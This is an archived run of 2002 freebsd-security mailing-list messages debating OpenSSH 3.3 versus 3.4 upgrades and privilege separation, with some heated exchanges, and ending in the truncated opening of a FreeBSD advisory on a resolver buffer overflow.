11:19:57 -0700 (PDT) Received: from apricot (cs24243228-109.austin.rr.com [24.243.228.109]) by sm13.texas.rr.com (8.12.0.Beta16/8.12.0.Beta16) with SMTP id g5QIYams000941 for ; Wed, 26 Jun 2002 13:34:36 -0500 From: "William Wallace" To: Subject: RE: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) Date: Wed, 26 Jun 2002 13:10:50 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <4.3.2.7.2.20020626115517.022108b0@localhost> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry for jumping in, but is there a way someone could post a note with the procedure that one needs to go through to update to OpenSSH 3.4? I just cvsup'd my security ports and the Makefiles under openssh and openssh-portable still point to 3.3 (which I'm currently running, after upgrading last night). Thanks, - William. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Brett Glass Sent: Wednesday, June 26, 2002 1:01 PM To: Bosko Milekic Cc: freebsd-security@FreeBSD.ORG Subject: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) At 11:24 AM 6/26/2002, Bosko Milekic wrote: > I think that what you're saying is reasonable, however, I know (now > almost for a fact) that there was an exploit going around already. In that case, the correct thing to do would have been to warn that turning on Privilege Separation was urgent because the bug was being exploited. That way, people who had planned upgrades for the weekend would not have been blindsided. > So, > it's better than the information has been released sooner, than later. > And, since it appears that the OpenSSH that ships with our -STABLE is > not affected, all the easier this is for those of us who were in the > middle of implementing "drastic measures" (for fear of the worst), as > it allows us to step back, relax, and enjoy the fireworks. Don't do that. When the OpenSSH team fixed the bug that ISS found, it also nuked some other bugs. Some of these may have been present in 2.9, and they'll now be obvious to black hats. (Nice, clean, color-coded diffs that can be generated automatically via the CVS Web interface.) So, users of FreeBSD releases (or -STABLE, -CURRENT, or release engineering snapshots) should not rest easy. An upgrade to 3.4 is mandatory for everyone. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:26:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 579C537B62B for ; Wed, 26 Jun 2002 11:23:54 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA13263; Wed, 26 Jun 2002 12:23:34 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626121804.022dc1b0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 12:23:18 -0600 To: Andrew Kenneth Milton From: Brett Glass Subject: Re: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) Cc: Bosko Milekic , freebsd-security@FreeBSD.ORG In-Reply-To: <20020627041540.U89115@zeus.theinternet.com.au> References: <4.3.2.7.2.20020626115517.022108b0@localhost> <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <20020626132416.A42340@unixdaemons.com> <4.3.2.7.2.20020626115517.022108b0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:15 PM 6/26/2002, Andrew Kenneth Milton wrote: >Au contraire. An upgrade to 3.4 is mandatory iff a security advisory is >released by the freebsd-security team indicating it is. The FreeBSD security team does not have an exclusive monopoly on good advice. And while it has done some good things, it has also failed to do many things that are necessary for good security. For example, it has not ensured that binary packages are updated when the corresponding ports are changed to correct security flaws. This leaves the many people who do network installs vulnerable to old security flaws when they install binary packages (as they're encouraged to do by the FreeBSD installer). --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:26:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 4625537B630 for ; Wed, 26 Jun 2002 11:24:06 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Wed, 26 Jun 2002 11:24:06 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: steve-lists@reentrant.co.uk Date: Wed, 26 Jun 2002 11:24:04 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Binary upgrade available Reply-To: pjklist@ekahuna.com Cc: security@FreeBSD.ORG In-reply-to: <20020626150645.A8340@chrome.intranet> References: <20020626121130543.AAA754@empty1.ekahuna.com@pc02.ekahuna.com>; from pjklist@ekahuna.com on Wed, Jun 26, 2002 at 05:11:32AM -0700 X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020626182406157.AAA771@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 26 Jun 2002, at 15:06, steve-lists@reentrant.co.uk boldly uttered: > * Philip J. Koenig [06m26d02y 13:32]: > > According to the steps outlined earlier to ascertain whether privsep > > is working, in my case it seems not to be. (I am of the impression > > that the path shown at the end should now show "/usr/empty"): > > > > > > #lsof -p |grep rtd > > sshd 109 root rtd VDIR 13,196608 1024 2 / > > This took me a while to figure out, but my understanding is this: > > The parent sshd process, still runs as root. > During login (i.e. when there is a password prompt being displayed), > sshd runs a less-privileged process, which is marked with [net] in the > output of ps. This handles the connection process and, at least for my > install of /usr/ports/security/openssh, runs as nobody in > /usr/local/empty. For example: > > nobody 1068 6.1 3.7 3524 2092 ?? S 2:52PM 0:01.65 sshd: steve [net] (sshd) > > The output of lsof -p 1068 | grep rtd is then : > > sshd 1068 nobody rtd VDIR 116,131078 512 45177 /usr/local/empty > > which I think is what you were expecting before. > > After authentication, there are two process per session: a privileged > process, marked with [priv] which is run as root; and another process > which runs as the user which is logging in. The latter looks like > "sshd: user@tty (sshd)". > > The above is just my understanding of it, but I hope that helps, > > Steve. I checked with lsof while an ssh session was in progress, and it still shows that all ssh-related processes are rooted at "/". There also are no processes owned by "sshd", only by root (marked with 'priv' as you mention, although clearly that doesn't have any security benefit per se) or the user logged in via ssh. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:33:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from theinternet.com.au (c16543.carlnfd1.nsw.optusnet.com.au [210.49.135.162]) by hub.freebsd.org (Postfix) with ESMTP id 3C2F137B4ED for ; Wed, 26 Jun 2002 11:30:34 -0700 (PDT) Received: (from akm@localhost) by theinternet.com.au (8.11.6/8.11.4) id g5QIUOS67160; Thu, 27 Jun 2002 04:30:24 +1000 (EST) (envelope-from akm) Date: Thu, 27 Jun 2002 04:30:24 +1000 From: Andrew Kenneth Milton To: Brett Glass Cc: Andrew Kenneth Milton , Bosko Milekic , freebsd-security@FreeBSD.ORG Subject: Re: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) Message-ID: <20020627043024.V89115@zeus.theinternet.com.au> References: <4.3.2.7.2.20020626115517.022108b0@localhost> <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <20020626132416.A42340@unixdaemons.com> <4.3.2.7.2.20020626115517.022108b0@localhost> <20020627041540.U89115@zeus.theinternet.com.au> <4.3.2.7.2.20020626121804.022dc1b0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <4.3.2.7.2.20020626121804.022dc1b0@localhost>; from brett@lariat.org on Wed, Jun 26, 2002 at 12:23:18PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org +-------[ Brett Glass ]---------------------- | At 12:15 PM 6/26/2002, Andrew Kenneth Milton wrote: | | >Au contraire. An upgrade to 3.4 is mandatory iff a security advisory is | >released by the freebsd-security team indicating it is. | | The FreeBSD security team does not have an exclusive monopoly on good | advice. However their signal to noise ratio is far better than yours. -- Totally Holistic Enterprises Internet| | Andrew Milton The Internet (Aust) Pty Ltd | M:+61 416 022 411 | ACN: 082 081 472 ABN: 83 082 081 472 |akm@theinternet.com.au| Carpe Daemon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:36: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 0CFF037B7DA for ; Wed, 26 Jun 2002 11:30:49 -0700 (PDT) Received: from [80.129.124.89] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NHZ1-0000av-00 for freebsd-security@FreeBSD.ORG; Wed, 26 Jun 2002 20:30:47 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 330C529D for ; Wed, 26 Jun 2002 20:30:46 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id EE3B51E1 for ; Wed, 26 Jun 2002 20:30:42 +0200 (CEST) Subject: OpenSSH Security (just a question, please no f-war) From: Jan Lentfer To: FreeBSD Security Mailling List Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 26 Jun 2002 20:30:41 +0200 Message-Id: <1025116241.2817.2.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ok all, i somewhat gave up to follow the OpenSSH conversation on the list. I have ONE question: I am now running 3.3p1 on all my boxes (FreeBSD & Linux) with Privilige Separation enabled. Is this configuration secure for now or not? Do I have to update to 3.4 as soon as it is in ports or can I take a few days until everything has settled and calmed a little? Regards, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:38:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 7A1F637B8DF for ; Wed, 26 Jun 2002 11:36:26 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA13434; Wed, 26 Jun 2002 12:36:14 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626123409.02291bf0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 12:35:55 -0600 To: Andrew Kenneth Milton From: Brett Glass Subject: Re: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) Cc: Andrew Kenneth Milton , Bosko Milekic , freebsd-security@FreeBSD.ORG In-Reply-To: <20020627043024.V89115@zeus.theinternet.com.au> References: <4.3.2.7.2.20020626121804.022dc1b0@localhost> <4.3.2.7.2.20020626115517.022108b0@localhost> <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <20020626132416.A42340@unixdaemons.com> <4.3.2.7.2.20020626115517.022108b0@localhost> <20020627041540.U89115@zeus.theinternet.com.au> <4.3.2.7.2.20020626121804.022dc1b0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:30 PM 6/26/2002, Andrew Kenneth Milton wrote: >However their signal to noise ratio is far better than yours. In your opinion. In any event, I'm responsible enough to emit the signal, and to do so promptly. Notices from the FreeBSD Security Team often come long after the horse is out of the barn. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:44:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from tesla.distributel.net (nat.MTL.distributel.NET [66.38.181.24]) by hub.freebsd.org (Postfix) with ESMTP id 2777937B8D4 for ; Wed, 26 Jun 2002 11:42:45 -0700 (PDT) Received: (from bmilekic@localhost) by tesla.distributel.net (8.11.6/8.11.6) id g5QIdwb43620; Wed, 26 Jun 2002 14:39:58 -0400 (EDT) (envelope-from bmilekic@unixdaemons.com) Date: Wed, 26 Jun 2002 14:39:58 -0400 From: Bosko Milekic To: Jan Lentfer Cc: FreeBSD Security Mailling List Subject: Re: OpenSSH Security (just a question, please no f-war) Message-ID: <20020626143958.B43472@unixdaemons.com> References: <1025116241.2817.2.camel@jan-linux.lan> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <1025116241.2817.2.camel@jan-linux.lan>; from Jan.Lentfer@web.de on Wed, Jun 26, 2002 at 08:30:41PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 08:30:41PM +0200, Jan Lentfer wrote: > Ok all, > > i somewhat gave up to follow the OpenSSH conversation on the list. I > have ONE question: I totally understand. > I am now running 3.3p1 on all my boxes (FreeBSD & Linux) with Privilige > Separation enabled. Is this configuration secure for now or not? > Do I have to update to 3.4 as soon as it is in ports or can I take a few > days until everything has settled and calmed a little? According to early reports, privsep should help you diminish the severity of the problem. However, since you've already bit the bullet, you may as well move on up to 3.4, as that is the official version containing the fix. It should be noted that from our interpretation, the version of OpenSSH shipping in -STABLE is /not/ vulnerable to this attack, so there is less reason to panic. However, just to be sure, if you already have the means and are well under way, move on up to 3.4. > Regards, > > Jan -- Bosko Milekic bmilekic@unixdaemons.com bmilekic@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:46:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail1.infospace.com (mail1.infospace.com [206.29.197.87]) by hub.freebsd.org (Postfix) with SMTP id B39A537BA53 for ; Wed, 26 Jun 2002 11:43:54 -0700 (PDT) Received: (qmail 11497 invoked from network); 26 Jun 2002 18:43:47 -0000 Received: from unknown (HELO absolut.inspinc.ad) (10.100.11.48) by jim.inspinc.ad with SMTP; 26 Jun 2002 18:43:47 -0000 Received: (qmail 15356 invoked from network); 26 Jun 2002 18:43:46 -0000 Received: from unknown (HELO ?10.99.33.65?) ([10.100.29.130]) (envelope-sender ) by absolut.inspinc.ad (qmail-ldap-1.03) with SMTP for ; 26 Jun 2002 18:43:46 -0000 User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Wed, 26 Jun 2002 11:43:45 -0700 Subject: Re: OpenSSH Security (just a question, please no f-war) From: William Carrel To: Jan Lentfer , FreeBSD Security Mailling List Message-ID: In-Reply-To: <1025116241.2817.2.camel@jan-linux.lan> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/26/02 11:30 AM, "Jan Lentfer" wrote: > Ok all, > > i somewhat gave up to follow the OpenSSH conversation on the list. I > have ONE question: > > I am now running 3.3p1 on all my boxes (FreeBSD & Linux) with Privilige > Separation enabled. Is this configuration secure for now or not? > Do I have to update to 3.4 as soon as it is in ports or can I take a few > days until everything has settled and calmed a little? If and only if you have ChallengeResponseAuthentication set to "yes" then you are vulnerable to a hole that will allow malicious code to be executed as the privsep user ("sshd") in the /var/empty chroot(). This could lead to further compromisation of your system (even inside the chroot as a relatively unprivileged user). -- William Carrel | Sr. Systems Engineer | william.carrel@infospace.com InfoSpace INC 601 108th Ave NE | Suite 1200 | Bellevue, WA 98004 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:47:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from blade-runner.mit.edu (BLADE-RUNNER.MIT.EDU [18.78.0.22]) by hub.freebsd.org (Postfix) with ESMTP id 7F24D37BAAA for ; Wed, 26 Jun 2002 11:46:01 -0700 (PDT) Received: (from petr@localhost) by blade-runner.mit.edu (8.11.6/8.11.6) id g5QIkWB46948; Wed, 26 Jun 2002 14:46:32 -0400 (EDT) (envelope-from petr) To: Theo de Raadt Cc: freebsd-security@freebsd.org Subject: Re: Wow References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> From: Petr Swedock Date: 26 Jun 2002 14:46:31 -0400 In-Reply-To: Theo de Raadt's message of Wed, 26 Jun 2002 11:41:03 -0600 Message-ID: <867kklaneg.fsf@blade-runner.mit.edu> Lines: 33 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Theo de Raadt writes: > > Man, you guys sure do talk shit a lot. But anyways, that is hardly > surprising or news. > > I do have a question though. > > Did any of you get broken in via this hole yet? > > Please, someone stand up and tell me they did. Ah doo declare... Theo, you are mah hero! I don't use Microsoft products because I don't want Bill Gates assessing my risks and making my decisions for me. I'll be rethinking my use of OpenSSH for the very same reason. You're not my dad, my cop, my priest, my lawyer or firefighter. NOR are you the Unix version of 'install wizard'. I expect code from you. That's it. Write code. I don't expect paternalism, risk assesments, restrictions, regulations or even the time of day. I have no concern for what you think my risks are NOR your preferred method of ameliorating those risks. Write the fucking code. I ask for no warrantee. I don't call you with help desk questions. Write the code and get down off that extremely high horse before you hurt yourself. Petr Swedock To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:55:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from ainaz.pair.com (ainaz.pair.com [209.68.2.66]) by hub.freebsd.org (Postfix) with SMTP id 65C0937BBAF for ; Wed, 26 Jun 2002 11:51:30 -0700 (PDT) Received: (qmail 39516 invoked by uid 3338); 26 Jun 2002 18:51:28 -0000 Date: Wed, 26 Jun 2002 14:51:27 -0400 From: Travis Cole To: Theo de Raadt Cc: freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626185126.GB35484@ainaz.pair.com> References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206261741.g5QHf3LI027927@cvs.openbsd.org> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 11:41:03AM -0600, Theo de Raadt wrote: > Man, you guys sure do talk shit a lot. But anyways, that is hardly > surprising or news. > > I do have a question though. > > Did any of you get broken in via this hole yet? Nope. Just wasted a good part of yesterday upgrading 60 boxes from a non-vulnerable version of OpenSSH to a version with a now known remote exploit. I think the PR for this issue could have been a bit better... -- -tcole To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:57:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 350C237BBB6 for ; Wed, 26 Jun 2002 11:51:36 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA13622; Wed, 26 Jun 2002 12:51:28 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626124251.02213460@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 12:51:15 -0600 To: Jan Lentfer , FreeBSD Security Mailling List From: Brett Glass Subject: Re: OpenSSH Security (just a question, please no f-war) Cc: markus@openssh.com In-Reply-To: <1025116241.2817.2.camel@jan-linux.lan> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:30 PM 6/26/2002, Jan Lentfer wrote: >I am now running 3.3p1 on all my boxes (FreeBSD & Linux) with Privilige >Separation enabled. Is this configuration secure for now or not? It's not clear. The OpenSSH team claims that when the fixed the bug discovered by ISS they also fixed other vulnerabilities which ISS did NOT discover. If any of these are in 3.3p1, we may be vulnerable. Markus would, of course, be the authority on this issue; maybe he'd care to comment? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:59:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 9F98837BBFC for ; Wed, 26 Jun 2002 11:53:32 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5QIsNLI015235; Wed, 26 Jun 2002 12:54:23 -0600 (MDT) Message-Id: <200206261854.g5QIsNLI015235@cvs.openbsd.org> To: Travis Cole Cc: freebsd-security@freebsd.org Subject: Re: Wow In-reply-to: Your message of "Wed, 26 Jun 2002 14:51:27 EDT." <20020626185126.GB35484@ainaz.pair.com> Date: Wed, 26 Jun 2002 12:54:23 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Wed, Jun 26, 2002 at 11:41:03AM -0600, Theo de Raadt wrote: > > Man, you guys sure do talk shit a lot. But anyways, that is hardly > > surprising or news. > > > > I do have a question though. > > > > Did any of you get broken in via this hole yet? > > Nope. Just wasted a good part of yesterday upgrading 60 boxes > from a non-vulnerable version of OpenSSH to a version with a now > known remote exploit. > > I think the PR for this issue could have been a bit better... We also did 5600 lines of further security auditing work over the last week. We're fairly convinced that some of the things we changed are relevant as well. ie. more holes. And that is commited in 3.4 By all means. Please continue running what you have. Don't upgrade to 3.4. And please turn privsep off. Or, please, use someone else's software. Please. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 12: 3:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from hermes.maverik.com (hermes.maverik.com [208.7.164.130]) by hub.freebsd.org (Postfix) with ESMTP id BFAA237BDB7 for ; Wed, 26 Jun 2002 12:02:08 -0700 (PDT) Received: from ech.maverik.com (ech.maverik.com [10.0.6.58]) by hermes.maverik.com (Postfix) with ESMTP id 169685295E1; Wed, 26 Jun 2002 13:00:51 -0600 (MDT) Subject: Re: Wow From: Travis Stevenson To: Petr Swedock Cc: freebsd-security@freebsd.org In-Reply-To: <867kklaneg.fsf@blade-runner.mit.edu> References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 26 Jun 2002 13:01:45 -0600 Message-Id: <1025118105.443.8.camel@ech.maverik.com> Mime-Version: 1.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Wow, slow down a little. He just wanted to know if this has affected anyone. Just a simply yes or no would have been sufficient. And if you had anything to say to him it should have been sent to him and not to all of us. Come on. --Travis > I don't use Microsoft products because I don't want Bill > Gates assessing my risks and making my decisions for me. > > I'll be rethinking my use of OpenSSH for the very same > reason. You're not my dad, my cop, my priest, my lawyer > or firefighter. NOR are you the Unix version of 'install > wizard'. I expect code from you. That's it. Write code. > > I don't expect paternalism, risk assesments, restrictions, > regulations or even the time of day. I have no concern > for what you think my risks are NOR your preferred method > of ameliorating those risks. Write the fucking code. I ask > for no warrantee. I don't call you with help desk questions. > Write the code and get down off that extremely high horse > before you hurt yourself. > > Petr Swedock > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 12:11:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 253BF37BE95; Wed, 26 Jun 2002 12:08:23 -0700 (PDT) Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QJ8NJU035405; Wed, 26 Jun 2002 12:08:23 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QJ8NVD035404; Wed, 26 Jun 2002 12:08:23 -0700 (PDT) Date: Wed, 26 Jun 2002 12:08:23 -0700 (PDT) Message-Id: <200206261908.g5QJ8NVD035404@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:28.resolv Security Advisory The FreeBSD Project Topic: buffer overflow in resolver Category: core Module: libc Announced: 2002-06-26 Credits: Joost Pol Affects: All releases prior to and including 4.6-RELEASE Corrected: 2002-06-26 06:34:18 UTC (RELENG_4) 2002-06-26 08:44:24 UTC (RELENG_4_6) 2002-06-26 18:53:20 UTC (RELENG_4_5) FreeBSD only: NO I. Background The resolver implements functions for making, sending and interpreting query and reply messages with Internet domain name servers. Hostnames, IP addresses, and other information are queried using the resolver. II. Problem Description DNS messages have specific byte alignment requirements, resulting in padding in messages. In a few instances in the resolver code, this padding is not taken into account when computing available buffer space. As a result, the parsing of a DNS message may result in a buffer overrun of up to a few bytes for each record included in the message. III. Impact An attacker (either a malicious domain name server or an agent that can spoof DNS messages) may produce a specially crafted DNS message that will exploit this bug when parsed by an application using the resolver. It may be possible for such an exploit to result in the execution of arbitrary code with the privileges of the resolver-using application. Though no exploits are known to exist today, since practically all Internet applications utilize the resolver, the severity of this issue is high. IV. Workaround There is currently no workaround. V. Solution Do one of the following: 1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6 or RELENG_4_5 security branch dated after the correction date (4.6-RELEASE-p1 or 4.5-RELEASE-p7). 2) To patch your present system: The following patch has been verified to apply to FreeBSD 4.5 and FreeBSD 4.6 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch 